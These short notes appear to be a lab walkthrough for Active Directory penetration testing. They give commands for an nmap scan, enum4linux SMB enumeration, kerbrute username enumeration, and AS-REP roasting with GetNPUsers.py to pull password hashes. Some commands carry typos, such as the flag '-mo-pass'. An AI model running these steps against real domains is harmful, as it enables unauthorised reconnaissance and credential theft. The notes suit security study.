AD Pentesting

Start with a Simple Nmap scan

Also ldap also enumerated the domain name.. so see Domain-name.local in Ldap port 389

nmap -O -sS -sV 142.168.168.20/24

nmap scan shows this Windows machine has AD-Services installed on it

---

enumerate port 139/445

• What is the NetBIOS-Domain Name of the machine?

enum4linux -n 10.49.160.26
enum4linux -A  spookysec.local

---

Enumerating Users via Kerberos

Kerbrute will allow us to enumerate valid usernames

./kerbrute_linux_amd64 userenum userslist.txt -d Domain-name.local --dc Domain-name.local

---

Find the hash of the valid Users

user who doesn’t require Pre-Auth (Pre-Auth kerbrose Disabled)

python3 GetNPUsers.py -request -userfile user.txt -mo-pass -dc-ip 10.10.10.161